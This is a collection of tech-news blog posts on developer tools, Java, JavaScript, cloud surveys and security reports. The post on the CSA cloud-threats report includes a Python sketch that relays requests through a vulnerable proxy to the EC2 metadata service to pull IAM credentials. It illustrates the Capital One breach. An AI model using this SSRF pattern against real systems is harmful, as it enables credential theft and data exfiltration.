Intel Distro of OpenVINO Helps Devs with Inferencing Beyond Computer Vision

Developers continue to adapt to the advent of Artificial Intelligence (AI) in nearly everything--or, more precisely, of machine learning (ML) and deep learning (DL). And the tools are evolving along with this growing demand.

One example is the OpenVINO toolkit. OpenVINO stands for Open Visual Inference and Neural Network Optimization. It's a toolkit developed and open sourced by Intel to facilitate faster inference of deep learning models on Intel hardware. It's based on convolutional neural networks (CNNs), a class of deep learning models designed for working with two-dimensional image data, although it can also be used with one-dimensional and three-dimensional data. The open-source version is licensed under the Apache License v2.

I talked with Bill Pearson, VP of Intel's IoT group, about his company's distro of OpenVINO.

"I suppose the key thing this tool does is to simplify the process of helping developers with their high performance inferencing needs," Pearson told me. "We're seeing a number of different use cases and requirements for doing inference--which silicon do I need, and what programming models on top of it. This can be quite confusing, so with OpenVINO, we created an API-based programming model that allows you to write once and deploy anywhere. What that means practically is, we take all the complexity of writing for FPGA, GPU, CPU, or whatever. We hide that complexity, so the developers have a consistent interface that lets them literally write once and then deploy to any of those different architecture types, depending on their needs and their requirements."

The first set of use cases Intel focused on was all computer vision related, Pearson said, because that's where most developers needed help with inferencing. But with the most recent release of the toolkit, Intel is looking at inference beyond computer vision.

OpenVINO 2021.1, announced in October, is designed to enable end-to-end capabilities that leverage the toolkit for workloads beyond computer vision. These capabilities include audio, speech, language, and recommendation with new pretrained models; support for public models, code samples, and demos; and support for non-vision workloads in the DL Streamer component.

This release also introduces official support for models trained in the TensorFlow 2.2.x framework; support for 11th generation Intel Core processors (formerly code named Tiger Lake); and new inference performance enhancements with Intel Iris Xe graphics, Intel Deep Learning Boost (Intel DL Boost) instructions, and Intel Gaussian & Neural Accelerator 2.0 for low-power speech processing acceleration.

It comes with the OpenVINO model server, an add-on to the Intel distro that delivers inference as a scalable microservice. "This add-on provides a gRPC or HTTP/REST endpoint for inference, making it easier to deploy models in cloud or edge server environments," the company said in a statement. The server is now implemented in C++, which reduces the container footprint (to less than 500 MB, for example) and delivers higher throughput and lower latency.
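
To give a feel for that endpoint, here's a hedged sketch of a REST inference call against the model server, which follows the TensorFlow Serving REST conventions; the host, port, and model name below are placeholders for whatever the server was started with:

```python
import numpy as np
import requests

# Placeholder endpoint: assumes a server started with a model named
# "my_model" and a REST port of 8000. Adjust to your deployment.
url = "http://localhost:8000/v1/models/my_model:predict"

# TensorFlow Serving-style request body: a batch of input instances.
payload = {"instances": np.zeros((1, 3, 224, 224), dtype=np.float32).tolist()}

response = requests.post(url, json=payload, timeout=10)
response.raise_for_status()
predictions = response.json()["predictions"]
print(len(predictions))
```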

There's also a beta release due this quarter that integrates the Deep Learning Workbench with Intel DevCloud for the Edge. The result: developers can graphically analyze models using the Deep Learning Workbench on Intel DevCloud for the Edge, rather than being limited to a local machine, to compare, visualize, and fine-tune a solution against multiple remote hardware configurations.

"We have to deliver features, of course, but we also need to deliver on performance," Pearson said. "With this release, that's what we've done. Applying CNN is helping us to take advantage of modern AI, to be able to get models that do a much better job at delivering what we'd expect from inference, and to be able to detect that defect or notice that object."

Pearson offered some customer examples: "There are some great customer examples where we've seen this be true. The earliest things we've seen are in finding manufacturing defects. There's an aluminum engine provider who was doing inspections the old way--by hand. They had to wait for these objects to cool so that a person could turn them and look at them. You can imagine that doing that with a computer and a camera is going to be much more accurate and much quicker. And we've seen this expand way beyond that to use cases in health care for medical screenings, to things like sewer pipe inspections--which are basic, but essential--and to businesses like retail, where frictionless checkout systems are trying to see what objects are going through the scanner and tell what's being processed."

Intel OpenVINO is available today on its DevCloud.

Posted by John K. Waters on December 15, 2020


Jakarta EE 9 Released

The Eclipse Foundation's Jakarta EE Working Group today announced the release of the Jakarta EE 9 Platform, Web Profile specifications, and related TCKs. The Foundation made the announcement during its JakartaOne Livestream event, currently underway online.

This is the release that moves enterprise Java fully from the javax.* namespace to the jakarta.* namespace. It "provides a new baseline for the evolution and innovation of enterprise Java technologies under an open, vendor-neutral, community-driven process," the Foundation said in a statement. The fact that it doesn't do much more than that is the key virtue of this release, says the Foundation's executive director, Mike Milinkovich.
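
Concretely, the namespace move means an import like javax.servlet.http.HttpServlet becomes jakarta.servlet.http.HttpServlet. Real migration tooling, such as the Eclipse Transformer project, also rewrites bytecode, string constants, and deployment descriptors, but a toy sketch of the source-level rename conveys the idea (the package list below is abbreviated and illustrative, not the complete set that moved):

```python
import re
from pathlib import Path

# Illustrative subset of EE packages that moved. The real list is longer,
# and some javax.* packages (e.g., javax.swing) belong to Java SE and
# must NOT be renamed.
EE_PREFIXES = ["javax.servlet", "javax.persistence", "javax.ws.rs",
               "javax.ejb", "javax.faces", "javax.json", "javax.jms"]

PATTERN = re.compile(r"\b(" + "|".join(re.escape(p) for p in EE_PREFIXES) + r")\b")

def migrate_source(path: Path) -> None:
    """Rewrite javax.* EE references to jakarta.* in one .java file."""
    text = path.read_text(encoding="utf-8")
    migrated = PATTERN.sub(lambda m: "jakarta." + m.group(1)[len("javax."):], text)
    if migrated != text:
        path.write_text(migrated, encoding="utf-8")

for java_file in Path("src").rglob("*.java"):
    migrate_source(java_file)
```

The subtlety, and the reason dedicated tooling exists, is that only the Enterprise Edition packages moved; javax.* packages that are part of Java SE stay put.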

"It's important to understand that announcing a release in which the only thing we did was change the namespace was very much by design," Milinkovich told me. "When you're taking about a 20-year-old, multibillion-dollar ecosystem, and moving it forward, it's really important that you do it in a way that makes it as easy as possible for the ecosystem to come along with you."

The Foundation's Jakarta EE Working Group was established in March 2018, so they've been at this for a while. And the group has faced a few headwinds along the way--perhaps most notably Oracle's refusal to give up the javax.* namespace. The plan for a complete change-over from javax.* to jakarta.* was, of course, controversial. The move even had a nickname: "The Big Bang."

"To be fair to Oracle, it's a two-decades-old platform they acquired from Sun Microsystems that had lots of legal constraints on it," Milinkovich said, "agreements that go back many decades. At the end of the day, I don't think there was any ill will or anything like that [from Oracle], and I even have to acknowledge that the engineering teams that we worked with from Oracle--who have made all this possible--were fantastic. It's unfortunate that we weren't able to just carry the javax.* namespace forward, because that would have been easier for everybody. But it just turned out to be an unsolvable set of constraints."

This namespace change firmly establishes Jakarta EE 9 as a foundation on which cloud-era innovations can be built for future Java infrastructure, the Foundation says. Jakarta EE 9 also enables enterprise end users and software vendors to migrate from previous versions to newer cloud-native tools, products, and platforms.

"Just changing the namespace is going to have a big impact," he said. "It allows the vendors who sell application servers--like WebLogic, WebSphere, JBoss, Open Liberty, Payara, etc.--the tooling ecosystem--IntelliJ, JetBrains, Apache NetBeans, our own Eclipse IDE--and the other Java runtimes--Spring Boot, Micronaut, Orcas, and the like--to migrate forward with the least possible disruption. We are now free to innovate in our own namespace."

Approximately 90 percent of the Fortune 500 are running enterprise Java apps in production, the Foundation has said, and the Jakarta EE 9 specifications "give new life to this massive installed base."

The enterprise Java ecosystem is generating more interest from vendors than it has in years, Milinkovich said, which is something of a validation of the Foundation's approach.

"On the vendor side, it had been whittled down to IBM, Red Hat, Payara, Tomitribe, and Fujitsu," he said. "But now, we're getting a lot more vendor engagement, participation, and  support. All good things."

With this release the Eclipse Foundation is also announcing the certification of Eclipse GlassFish 6.0.0, as well as several solutions working on compliance for 2021, including:

● Apusic AAS
● Fujitsu Software Enterprise Platform
● IBM WebSphere Liberty
● JBoss Enterprise Application Platform
● Open Liberty
● Payara Platform
● Piranha Micro
● Primeton AppServer
● TMax JEUS
● WildFly

It's worth keeping in mind that specification approval was fresh territory for the Eclipse Foundation, and it had to put together a brand new specification process. Jakarta EE is being developed and maintained under the Jakarta EE Specification Process, which replaces the Java Community Process (JCP) for Java EE.

Accepting the stewardship of enterprise Java and shepherding its successful journey to Jakarta EE is a real feather in the Foundation's cap, Milinkovich said.

"I think a lot of other organizations might have given up along the way," he said, "but the persistence, experience, and intellectual property sophistication we have at the Foundation led us to find a path that got us to where we are."

The Jakarta EE roadmap for 2021 includes at least one more (huge) baby step in Jakarta EE 9.1: the move of the base platform from Java SE 8 to Java SE 11. Efforts are already under way for that release, though Milinkovich didn't offer a release date.

"I don't know when it's coming, but we're turning the crank as fast as possible," he said.

Moving the base Java platform from Java SE 8 to Java SE 11 is a logical next step in this process. Java 8 is still the most widely used version of Java, and Java 11 is next in popularity.

"By moving this Java platform forward we're helping to modernize the Java ecosystem," Milinkovich said.

Posted by John K. Waters on December 8, 2020


JavaScript Turns 25: Pluralsight Gurus Weigh In

On Friday, December 4, JavaScript turns 25. The venerable client-side scripting language had a wobbly start when Mozilla co-founder Brendan Eich unveiled it in 1995, but today it runs on every Web browser, cell phone, Internet-enabled TV, and smart dishwasher.

When Java turned 25 in May of this year, online course provider Pluralsight shared with ADTmag readers the insights of its Java course authors on the impact of that juggernaut of a programming language and platform. Now the technology workforce development company has turned to its popular JavaScript course authors on the occasion of the senior scripter's silver anniversary "to reflect on its impact and continued influence on the world, as well as their own personal journey with the programming language."

In addition to the wisdom of its teachers, Pluralsight is offering free access to 25 of its most popular JavaScript courses throughout December (five free courses a week). Also, check out the relaunched JavaScript.com, which includes new resources "designed to help JavaScript developers of all abilities."

How important is JavaScript today compared to when it first launched?

Cory House, @housecor: When JavaScript first launched, it was unclear if it would take off. It was written in a few days, and initially only offered in a single browser. Microsoft's first browser shipped with their own flavor of JavaScript, called JScript. Today, JavaScript makes the world go 'round. It runs on every computer. Every phone. TVs. Even some appliances. A huge portion of humanity relies on JavaScript every day without realizing it.

Jonathan Mills, @jonathanfmills: When JavaScript first launched, it was just there to help a webpage be interactive. JS is no longer contained to the browser. Now JavaScript has grown into a massive ecosystem that has impact in every area of software development. As a JS developer, I can write applications on the backend, frontend, mobile device, and IoT devices.

Nate Taylor, @taylonr: The easy answer is to talk about how JavaScript is used today across the entire spectrum of software development. From web applications, mobile applications, servers and even as stored functions in databases. And while that's true, I think it neglects the importance of JavaScript when it first launched. Prior to JavaScript's introduction, the web was not much more than static hypertext delivered in a browser. Without JavaScript, we likely don't have the web that we do today, but we didn't necessarily understand that when it was first released.

What makes JavaScript such a timeless programming language?

House: JavaScript is timeless because it's approachable, multiparadigm, and ubiquitous. There are multiple ways to accomplish a given task. You can code in an object-oriented or functional style. And since JavaScript has a C-like syntax, it feels familiar to people who have worked in other C-like languages. JavaScript remains "timeless" by continually embracing good ideas from other languages.

Mills: Honestly, I think it's a combination of simplicity and flexibility. The learning curve of JavaScript is much lower than the typical enterprise languages of C# and Java, so it is easy to pick up. But its flexibility in running everywhere and its very lightweight nature make it easy to get things done everywhere. The combination of those two things make JavaScript an easy tool to reach for given any job.

Taylor: I think the number one thing is the community. It's driven by countless engineers who are constantly exploring and trying out new things. Because of the community, we now have NodeJS, so that we can run JavaScript on the server. We have libraries like RamdaJS, which brings in concepts from functional programming languages and makes them accessible to JavaScript developers. We even have TypeScript as a super-set of JavaScript. And through all of that, the language has grown and adapted. In some ways, the fluidity of the language that causes so many of us problems when we first learn it, is part of what keeps it going even today.

What would the web or e-commerce look like if we didn't have JavaScript?

House: Without JavaScript, the web would be similar to the late 90's. Simpler and lighter-weight, but also less feature-rich. We'd have to post back to the server on every request, leading to a clunkier user experience.

Mills: While it's almost impossible to say what it would look like without JavaScript, I will say it would be fundamentally different.

Taylor: It would be slower and more frustrating. Imagine signing up for a service. The only way to know if your username was available would be to submit the entire form to the server and have it tell you if that was available. If the name was taken, you'd have to fill out the entire form again and resubmit. Eventually you would either find a unique name, or you'd give up. But with JavaScript, we're able to do this behind the scenes. While you're filling out the form--sometimes while you're typing the username--you can receive instant feedback if that name is available.

Additional problems would exist for e-commerce, as well. A common situation today is to see something in your cart and decide to change the quantity, or possibly even save it for later in a wish list. Those are relatively straightforward JavaScript calls. Without that, you would again be forced to resubmit the entire form until you were ready to proceed.

When did you first learn JavaScript? What impact has it had on you personally?

House: I learned JavaScript in the late 90s. It was awful. The debugging experience was horrendous. I often couldn't tell clearly what had failed. It ran significantly differently on Internet Explorer than Netscape. It was so painful early on that I embraced Flash and expected it to overtake HTML and JavaScript in popularity. Clearly, I was wrong! As JavaScript matured, so did related libraries and browsers. Today, coding in JavaScript is a wonderful, rapid feedback experience.

Mills: For the vast majority of my career I have been a backend developer in the .NET and Java space. But as the ecosystems grew and the sheer weight of projects increased, I found myself looking for alternatives that would let me solve business problems faster. I made the transition to node and AngularJS a while ago and have never looked back. The speed and reliability of the tooling is something I really enjoy.

Taylor: Sometime around 2009 was when I first started learning JavaScript. I didn't care for it, because I liked working on thick client applications in C#. That said, I did see its usefulness, particularly on one side project, where I was able to use jQuery for a grid that was displaying data. Experimenting with that bit of JavaScript helped open several doors for me. It allowed me to interview for a web developer position that ended up changing the course of my career.

In addition to helping me land jobs for my 9-to-5 work, JavaScript also indirectly led me to more teaching as I advanced in my career. I found that JavaScript offered different ways of solving problems than I was used to. And in explaining those ideas to other developers I realized that I enjoyed helping others learn and grow. It was exciting to see developers grasp new ideas.

What does the future look like for JavaScript? What's coming next year, 2-3 years from now, etc.?

House: For around 10 years, JavaScript didn't change at all. Thankfully, today new JavaScript releases occur every June. In the short term, I expect to continue to see mostly minor enhancements that implement good ideas from competing languages. Longer-term, I expect to see JavaScript increasingly used as a compile target: people will increasingly use languages that compile to JavaScript. Today, TypeScript is a popular example, but we may see other, more popular, higher-level alternatives in the future. And while Web Assembly is likely to grow increasingly popular in the coming years, it will continue to interface with JavaScript to get things done.

Mills: One of the primary complaints I have heard about JavaScript is that the massive open-source ecosystem is so hard to navigate and new frameworks pop up every day. I find that is less the case now than it was a year ago, and that trend will continue. I find most developers are using one of a few frameworks on the frontend (React and Vue), and almost everyone I know is using Express on the backend, and I see that trend continuing. Improvements will be made and features added, but for the most part, I think the ecosystem has solidified to a point that you can reliably pick up a tool and know that it will be around for a while.

Taylor: I think we've finally moved past the phase of JavaScript where everyone was making jokes about how fast a new library came out, and now we're to the point where we're trying to use it to provide real value to our users and clients. As a result, I think we'll continue to see JavaScript maturing. It will continue to get new features that help ease development in JavaScript. We'll continue to see more and more uses in areas that we don't immediately expect. It wasn't that long ago that writing a mobile app meant using Java or Swift, but now with frameworks like React Native, it's possible to use the same JavaScript skills that developers already have to create mobile apps.

Posted by John K. Waters on December 1, 2020


CNCF Survey 'Takes the Pulse' of the Global Cloud Native Community

This week's KubeCon + CloudNativeCon online event, wrapping up today, dominated our headlines, and for good reason. The flagship conference of the Cloud Native Computing Foundation (CNCF) was chock-a-block with vendor announcements and Kubernetes community news.

Among the noteworthy news from the CNCF itself was the publication of the results of its 2020 survey. Based on the responses of 1,324 members of the global cloud native community, the survey "takes the pulse" of that community to provide some clarity on where and how cloud native technologies are being adopted.

My list of key takeaways from this survey includes:

  • The use of containers in production has increased to 92%, up from 84% last year, and up 300% from the CNCF's first survey in 2016.
  • Kubernetes use in production has increased to 83%, up from 78% last year.
  • There has been a 50% increase in the use of all CNCF projects since last year's survey.
  • Usage of cloud native tools:
    • 82% of respondents use CI/CD pipelines in production.
    • 30% of respondents use serverless technologies in production.
    • 27% of respondents use a service mesh in production, a 50% increase over last year.
    • 55% of respondents use stateful applications in containers in production.

Public cloud continued to be the most popular data center approach in this year's survey (that's three years in a row). It increased slightly in usage from last year (64%, up from 62%). Private cloud or on-prem usage had the most significant increase (52%, up from 45%). Hybrid decreased slightly (36% down from 38% in 2019). Multi-cloud usage, a new survey option this year, accounted for 26%.

"For the purpose of this analysis, hybrid cloud refers to the use of a combination of on-premises and public cloud," the report explains. "Multi-cloud means using workloads across different clouds based on the type of cloud that fits the workload best. The portability that Kubernetes and cloud native tools provide makes it much simpler to switch from one public cloud vendor to another. The addition of multi-cloud as an option this year does not necessarily explain the drop in hybrid unless respondents use a different definition."

The survey compiled responses from the community gathered between May and June 2020. Of those responding, 54% indicated their organization is part of the CNCF End User Community, which comprises more than 140 companies and startups "committed to accelerating cloud native technologies and improving the deployment experience." Many of the respondents were based in Europe and North America, but it was a worldwide survey: 38% were from Europe; 33% from North America; 23% from Asia; and 6% from South and Central America, Africa, Australia, and Oceania. Two-thirds of respondents were from organizations with more than 100 employees, and 30% were from organizations with more than 5,000 employees, showing a strong enterprise representation.

This is a thoughtful survey with more stats on release cycles, normalized use of containers, Kubernetes environments, "container challenges," and more.

Posted by John K. Waters on November 19, 2020


Java and Python Top List of Languages People Most Want to Teach Themselves

Here's a report for the times: Specops Software sifted data from Ahrefs.com using its Google and YouTube search analytics tool to surface a list of the programming languages people most want to teach themselves. Python and Java topped that list of most "self-mastered" coding languages, not surprisingly. And YouTube was the primary tutor.

Specops found the most commonly searched-for programming languages on Google and YouTube within the last month and then, using Ahrefs.com, teased out the 13 languages with the most global searches, relying on phrases like "Learn Python" and "Learn Java." The results were then merged to find the most searched-for language overall around the world.

The researchers then investigated search volumes in the United States, United Kingdom, Canada, and Australia, to see which programming language these countries have been searching for the most on Google and YouTube.

Python had the most global searches on Google (182,000 monthly searches) and YouTube (53,000 monthly searches), for a combined volume of 235,000 each month.

"On a global scale, Python is the most searched for programming language to learn," the report states…. As one of the most versatile coding languages today, it should come as no surprise that this is one of the most popular programming languages for those wanting to learn how to code – particularly beginners. What's more, our recent study found that it is one of the most sought-after programming languages by employers around the world too."

Coming in second was Java, with 64,000 Google searches and 20,000 YouTube searches, for a total volume of 84,000 monthly. "Learn Java" was the second most popular keyword search for those wanting to learn how to code, the report states.

C++ came in third, with 56,000 total searches per month. SQL, PHP, and R placed fourth, fifth, and sixth, respectively, with combined Google and YouTube searches reaching 45,000, 31,400, and 14,000.

The least in-demand programming language in this report was Rust, with only 2,150 total searches monthly. Next to last on the list was JavaScript, with only 1,900 searches.

Among the US, UK, Canada, and Australia, the US had the highest volume of collective searches across the 13 languages, totaling 182,150.

"As the employment market becomes more competitive, self-taught skills and experience have become increasingly valuable across the globe, and programming languages are no exception," the report states.

Posted by John K. Waters on November 12, 2020


Jonas Bonér and the Reactive Manifesto II

It's been about seven years since Jonas Bonér, co-founder and CTO of Lightbend and creator of the Akka project, first published "The Reactive Manifesto" with contributions from Dave Farley, Roland Kuhn, and Martin Thompson. He and his colleagues used that document to provide an accessible and succinct definition of reactive systems--software developed using message-driven and event-driven approaches to achieve the resiliency, scalability, and responsiveness required for cloud-native applications.

"We needed a way to explain what we we're talking about that wasn't full of geeky buzzwords and ended up just being confusing," Bonér told me at the time. "The manifesto distills things down to the essence of these new applications, which are being built right now, and provided a vocabulary that would allow developers to talk about these things."

This week, under the auspices of the Linux Foundation and the newly formed Reactive Foundation, Bonér and a veritable crowd of collaborators published an updated and expanded version of that document, entitled "The Reactive Principles." The press announcement characterized the new document as a complement to the original that "incorporates the ideas, techniques, and patterns from both Reactive Programming and Reactive Systems into a set of practical principles, to apply Reactive to cloud native applications to realize the efficiencies of building for and running on the cloud."

"One of the problems with reactive is that it has been a little bit diluted over the years," Bonér explained during a recent Zoom interview. "People slapped 'reactive' on almost anything. Some things are actually reactive and some are variations. And some things called reactive aren't really living up to what we think it is. And that's why I felt it was important to get together with a lot of people, not just me, to define what reactive means and sort of breathe some new life into it."

The new document is the product of a collaboration among leading minds in the Reactive and broader distributed computing communities. Along with Bonér, the list of collaborators includes Roland Kuhn, Ben Christensen, Sergey Bykov, Clement Escoffier, Peter Vlugter, Josh Long, Ben Hindman, Vaughn Vernon, James Roper, Michael Behrendt, Kresten Thorup, Colin Breck, Allard Buijze, Derek Collison, Viktor Klang, Ben Hale, Steve Gury, Tyler Jewell, Ryland Degnan, James Ward, and Stephan Ewen.

The original manifesto was intentionally short and designed to be easily digestible ("Even CIOs read it," Bonér said.) The new "Principles" document is as rich as the original was lean. Among other things, it lays out the eight principles an application must embrace in its design, its architecture, and even its programming model to be considered Reactive:

  • Stay Responsive -- always respond in a timely manner
  • Accept Uncertainty -- build reliability despite unreliable foundations
  • Embrace Failure -- expect things to go wrong and build for resilience
  • Assert Autonomy -- design components that act independently and interact collaboratively
  • Tailor Consistency -- individualize consistency per component to balance availability and performance
  • Decouple Time -- process asynchronously to avoid coordination and waiting
  • Decouple Space -- create flexibility by embracing the network
  • Handle Dynamics -- continuously adapt to varying demand and resources

"The Reactive Principles" also offers sets of design principles for cloud-native and edge-native applications, as well as patterns that can help codify and apply the Reactive Principles to applications and systems.

The Reactive Foundation, launched last year with founding members Alibaba Cloud, Facebook, Lightbend, VMware, and VLINGO, is a non-profit organization established to provide a formal open governance model and neutral ecosystem for creating open-source Reactive projects. The group is a top-level project within the Linux Foundation that is "dedicated to being a catalyst for advancing a new landscape of technologies, standards, and vendors."

Bonér was set to unveil "The Reactive Principles" today during his keynote presentation at the Reactive Summit 2020 virtual event.

"The cloud needs a programming model that brings the same reliability, predictability, and scalability at the application layer that Kubernetes has brought to the infrastructure layer," Bonér said in a statement.

You can find an early edition of "The Reactive Manifesto" online. At least you could as of this writing. It's worth a look before digging into the new document, which, though much longer, is just as accessible.

The Reactive Foundation also announced that two open-source projects, R2DBC and Reactive Streams, have joined the foundation, and that a newly formed Technical Oversight Committee is evaluating additional open-source project candidates. The R2DBC project brings Reactive programming APIs to relational databases in an effort to provide a better alternative to JDBC and the "blocking" issues it creates for SQL databases in Reactive Systems. Reactive Streams is an initiative to provide a standard for asynchronous stream processing with non-blocking back pressure, encompassing runtime environments (JVM and JavaScript) as well as network protocols.
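
The "non-blocking back pressure" phrase deserves unpacking: a fast publisher must not overwhelm a slow subscriber, so the subscriber signals how much it can take, and Reactive Streams standardizes that demand signaling across libraries and runtimes. As a rough stand-in for the concept (not the Reactive Streams protocol itself), the sketch below gets a similar effect with a bounded queue, where the producer suspends whenever the consumer falls behind:

```python
import asyncio

async def fast_producer(queue: asyncio.Queue) -> None:
    for i in range(10):
        # With maxsize=2, put() suspends whenever the consumer lags:
        # the producer is throttled without blocking a thread.
        await queue.put(i)
        print(f"produced {i}")
    await queue.put(None)  # sentinel: no more items

async def slow_consumer(queue: asyncio.Queue) -> None:
    while (item := await queue.get()) is not None:
        await asyncio.sleep(0.2)  # consumer is deliberately slower
        print(f"consumed {item}")

async def main() -> None:
    queue: asyncio.Queue = asyncio.Queue(maxsize=2)  # bounded = back pressure
    await asyncio.gather(fast_producer(queue), slow_consumer(queue))

asyncio.run(main())
```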

The first project of the foundation, RSocket, is an implementation of Reactive Streams that provides a message-driven binary protocol for use on byte stream transports, such as TCP and WebSockets.

 

Posted by John K. Waters on November 10, 2020


'Nature vs. Nurture' in Application Security Testing

It'll surprise no one in the software-making business to hear an app security vendor claim that the majority of applications contain at least one security flaw. (Really? Only one?) But a new report from Application Security Testing (AST) solutions provider Veracode serves as a cogent reminder that it often takes months to fix those flaws.

The report, "State of Software Security," available as a free download, analyzes 130,000 applications. The report's authors determined that it takes about six months for teams to close half the security flaws they find. The report also outlines some best practices to significantly improve those deplorable fix rates.

Veracode's researchers found that there are some factors teams tend to have a lot of control over, and others over which they have very little. The report's authors went with "nature vs. nurture" categories for these factors. Within the "nature" category, Veracode considered factors such as the size of the application and the organization, as well as security debt; the "nurture" side accounts for actions such as scanning frequency, cadence, and scanning via APIs.

Again, not surprisingly, addressing issues with modern DevSecOps practices results in higher flaw remediation rates, they found. Some examples: using multiple application security scan types, working within smaller or more modern apps, and embedding security testing into the pipeline via an API. All of these make a difference in reducing the time it takes to fix security defects, the report's authors found, even in apps with a less-than-ideal "nature."

"The goal of software security isn't to write applications perfectly the first time, but to find and fix the flaws in a comprehensive and timely manner," said Chris Eng, Chief Research Officer at Veracode, in a statement. "Even when faced with the most challenging environments, developers can take specific actions to improve the overall security of the application with the right training and tools."

This is Veracode's 11th annual report on secure application development. A partial list of some other key findings includes:

  • Flawed applications are the norm: 76% of applications have at least one security flaw, but only 24% have high-severity flaws. This is a good sign that most applications do not have critical issues that pose serious risks to the application. Frequent scanning can reduce the time it takes to close half of observed findings by more than three weeks.
  • Open source flaws on the rise: while 70% of applications inherit at least one security flaw from their open source libraries, SOSS 11 also found that 30% of applications have more flaws in their open source libraries than in the code written in-house. The key lesson is that software security comes from getting the whole picture, which includes identifying and tracking the third-party code used in applications.
  • Multiple scan types prove efficacy of DevSecOps: teams using a combination of scan types including static analysis (SAST), dynamic analysis (DAST), and software composition analysis (SCA) improve fix rates. Those using SAST and DAST together fix half of flaws 24 days faster.
  • Automation matters: those who automate security testing in the SDLC address half of the flaws 17.5 days faster than those that scan in a less automated fashion.
  • Paying down security debt is critical: the link between frequently scanning applications and faster remediation times has been established in Veracode's prior State of Software Security research. This year's report also found that reducing security debt--fixing the backlog of known flaws--lowers overall risk. SOSS 11 found that older applications with high flaw density experience much slower remediation times, adding an average of 63 days to close half of flaws.

Veracode's native SaaS solution is designed to enable companies to move AppSec to the cloud securely, and it supports cloud-native applications "while empowering developers to fix, not just find, flaws," the company says. Veracode has helped customers fix more than 10.5 million security defects in their software via analysis of more than 7.8 trillion lines of code between Jan. 1, 2020, and Oct. 5, 2020, the company says.

Posted by John K. Waters on November 5, 2020


CSA Dives Deep Into 'Egregious' Cloud Computing Threats

The Cloud Security Alliance (CSA) published a report in late September that I just got around to reading. I guess it was the Halloween season that drew me to the title, "Top Threats to Cloud Computing: Egregious 11 Deep Dive." It provides case study analyses of last year's "The Egregious 11: Top Threats to Cloud Computing," with nine recent cybersecurity attacks and breaches. (Both reports featured a scary octopus on their covers.)

All kidding aside, the deep dive is well worth a look, and it's free. The so-called Egregious 11, you'll recall, were culled from a survey of 241 industry experts on security issues in the cloud. The respondents rated 11 "salient threats, risks, and vulnerabilities" in their cloud environments. The Top Threats Working Group used the survey results, along with its own expertise, to create the final 2019 report.

The new report looks at nine actual attacks and breaches, including "a major financial services company, a leading enterprise video communications firm, and a multinational grocery chain," as its foundation. The report "connects the dots between the CSA Top Threats in terms of security analysis," Jon-Michael C. Brook, chair of the Top Threats Working Group, wrote in a foreword to the report. And I think it does so quite effectively.

The list of organizations whose breaches were analyzed is a sexy one. It includes Capital One, Disney+, Dow Jones, GitHub, Imperva, Ring, Tesco, Tesla, and Zoom.

Each of the nine examples is presented in the form of a reference chart and a detailed narrative. The reference chart provides an attack-style synopsis, spanning from the threat actor and vulnerabilities to the end controls and mitigations.

Here's one example of the narrative portion of the Capital One breach analysis:

Actor: A former AWS engineer with insider knowledge of platform vulnerabilities gained credentials from a misconfigured web application to extract sensitive information from protected cloud folders.

Attack: Open-source anonymity network (Tor) and VPN services (iPredator) hid the attacker. A misconfigured ModSecurity WAF used by Capital One with its AWS cloud operations relayed AWS cloud metadata services, including credentials to cloud instances. Overprivileged access given to the WAF allowed the attacker to reach protected cloud storage (AWS S3 buckets) with the ability to read and sync data, and to exfiltrate sensitive information.

Vulnerabilities: A Server Side Request Forgery (SSRF) vulnerability on the platform was exposed, in which a server (e.g., Capital One's WAF) was tricked by an attacker's requests into accessing cloud server configurations (e.g., the EC2 metadata service), including credentials to whatever the server had access to.

Data Breach: A web application was compromised for IAM credentials to access multiple cloud folders. The cloud folders accessed had read rights to 106 million records of customer information that were exfiltrated.

Data Loss: The data extracted were credit card applications and credit card customer status reports from 2005 to 2019. Personally Identifiable Information (PII) from the applications included applicant names, addresses, zip codes/postal codes, phone numbers, email addresses, dates of birth, and self-reported income. The credit card customer PII and financial records extracted included credit scores, credit limits, balances, payment history, contact information, Social Security numbers, and linked bank accounts. Approximately 140,000 Social Security numbers and 80,000 linked bank account numbers of secured credit card customers were exfiltrated.
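
The SSRF mechanics the report describes are worth making concrete. On instances running the original metadata service (IMDSv1), any server-side code that can be induced to fetch an attacker-chosen URL can be aimed at the link-local metadata endpoint and made to relay temporary credentials back. The sketch below is illustrative only: the metadata paths are real and widely documented, but the vulnerable relay endpoint and its url parameter are hypothetical stand-ins for the misconfigured WAF:

```python
import requests

# Link-local EC2 instance metadata endpoint. IMDSv1 answers plain GETs;
# IMDSv2's session tokens were later introduced largely to blunt SSRF.
METADATA = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

def relay(vulnerable_url: str, target: str) -> str:
    # Hypothetical flaw: a server-side "url" parameter that the victim
    # fetches verbatim and echoes back, as the misconfigured WAF did.
    return requests.get(vulnerable_url, params={"url": target}, timeout=5).text

# Step 1: the relayed metadata response lists the instance's IAM role name.
role = relay("https://victim.example/proxy", METADATA).strip()

# Step 2: appending the role name returns temporary credentials scoped to
# whatever that role can reach--here, the S3 buckets that were exfiltrated.
credentials_json = relay("https://victim.example/proxy", METADATA + role)
```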

I think these narratives read like mystery/thrillers, and the companies are name brands for the most part. Even if you're not usually into this kind of thing, this is an accessible report with useful insights that developers and IT pros alike should definitely read.

Both reports were prepared by the CSA's Top Threats Working Group, which, the CSA says, aims to provide organizations with "an up-to-date, expert-informed understanding of cloud security risks, threats, and vulnerabilities in order to make educated risk-management decisions regarding cloud adoption strategies."

When the CSA first hit my radar in 2012, it described itself as a not-for-profit coalition of companies, individuals, organizations, and "key stakeholders" with an interest in promoting secure cloud computing. Its mission hasn't changed, and the website features a nice history and list of milestones. The group also issues the Certificate of Cloud Auditing Knowledge (CCAK) certification, currently the only credential for industry professionals who demonstrate expertise in the essential principles of auditing cloud computing systems. The CSA developed the most widely adopted cloud security audit criteria and organizational certification, which makes the group uniquely positioned to lead industry efforts to ensure that professionals have the requisite skill set for auditing cloud environments.

 

Posted by John K. Waters on November 2, 2020


Docker Inc.'s Strategic Shift to Dev Focus One Year Later

It's been almost exactly one year since Docker Inc. sold its enterprise platform business to Mirantis, a commercial distributor of OpenStack, to focus on the needs of enterprise application development teams. Since then, the company behind the leading containerization platform has concentrated on refining its dev tools and building an ecosystem of partners to support "code-to-cloud" automation for developers.

Docker CEO Scott Johnston talked with a group of reporters this week about the progress of that strategy and laid out the company's path going forward.

The sale to Mirantis was a burn-the-ships commitment to a massive restructuring of the company. "We sold off three quarters of our employee base, all the enterprise customers, and all the enterprise customer revenue," Johnston said. "All in the spirit of restarting the company with a new mission."

